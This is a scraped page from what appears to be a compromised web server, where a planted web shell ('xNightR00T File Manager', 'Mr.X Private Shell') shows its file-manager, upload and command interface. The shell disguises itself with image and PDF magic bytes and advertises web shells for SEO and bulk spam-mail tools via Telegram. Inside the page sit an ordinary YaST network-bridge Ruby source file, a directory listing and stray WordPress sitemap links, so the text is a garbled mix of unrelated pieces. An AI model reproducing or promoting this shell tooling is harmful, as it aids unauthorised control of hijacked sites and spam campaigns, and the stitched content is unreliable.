xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
# encoding: utf-8

# ***************************************************************************
#
# Copyright (c) 2012 Novell, Inc.
# All Rights Reserved.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of version 2 of the GNU General Public License as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.   See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, contact Novell, Inc.
#
# To contact Novell about this file by physical or electronic mail,
# you may find current contact information at www.novell.com
#
# **************************************************************************
# File:	include/network/lan/address.ycp
# Package:	Network configuration
# Summary:	Network card adresss configuration dialogs
# Authors:	Michal Svec <msvec@suse.cz>
#
module Yast
  module NetworkLanBridgeInclude
    include Logger

    def initialize_network_lan_bridge(_include_target)
      textdomain "network"
    end

    # Immediately updates device's ifcfg to be usable as bridge port.
    #
    # It mainly setups suitable BOOTPROTO an IP related values
    def configure_as_bridge_port(device)
      selected_interface = NetworkInterfaces.Current
      log.info("Adapt device #{device} as bridge port")

      # when using wicked every device which can be bridged
      # can be set to BOOTPROTO=none. No workaround with
      # BOOTPROTO=static required anymore
      if NetworkInterfaces.Edit(device)
        NetworkInterfaces.Current["IPADDR"] = ""
        NetworkInterfaces.Current["NETMASK"] = ""
        NetworkInterfaces.Current["BOOTPROTO"] = "none"
        # take out PREFIXLEN from old configuration (BNC#735109)
        NetworkInterfaces.Current["PREFIXLEN"] = ""

        # remove all aliases (bnc#590167)
        aliases = NetworkInterfaces.Current["_aliases"] || {}
        aliases.each do |alias_name, alias_ip|
          NetworkInterfaces.DeleteAlias(device, alias_name) if alias_ip
        end
        NetworkInterfaces.Current["_aliases"] = {}

        NetworkInterfaces.Commit
        NetworkInterfaces.Add

        NetworkInterfaces.Current = selected_interface
      end

      Lan.autoconf_slaves += [device] unless Lan.autoconf_slaves.include? device

      true
    end

    def ValidateBridge(_key, _event)
      sel = UI.QueryWidget(Id("BRIDGE_PORTS"), :SelectedItems)

      configurations = NetworkInterfaces.FilterDevices("netcard")
      netcard_types = (NetworkInterfaces.CardRegex["netcard"] || "").split("|")

      confs = netcard_types.reduce([]) do |res, devtype|
        res.concat((configurations[devtype] || {}).keys)
      end

      valid = true

      sel.each do |device|
        next if !confs.include?(device)

        dev_type = NetworkInterfaces.GetType(device)
        ifcfg_conf = configurations[dev_type][device]

        next if ifcfg_conf["BOOTPROTO"] == "none"

        valid = Popup.ContinueCancel(
          _(
            "At least one selected device is already configured.\nAdapt the configuration for bridge?\n"
          )
        )
        break
      end
      valid
    end
  end
end

Filemanager

Name Type Size Permission Actions
address.rb File 52.49 KB 0644
bridge.rb File 3.3 KB 0644
cards.rb File 17.29 KB 0644
cmdline.rb File 9.84 KB 0644
complex.rb File 18.12 KB 0644
dhcp.rb File 4.77 KB 0644
hardware.rb File 37.49 KB 0644
help.rb File 27.94 KB 0644
s390.rb File 3.05 KB 0644
udev.rb File 3.36 KB 0644
virtual.rb File 8.04 KB 0644
wireless.rb File 45.08 KB 0644
wizards.rb File 7.26 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml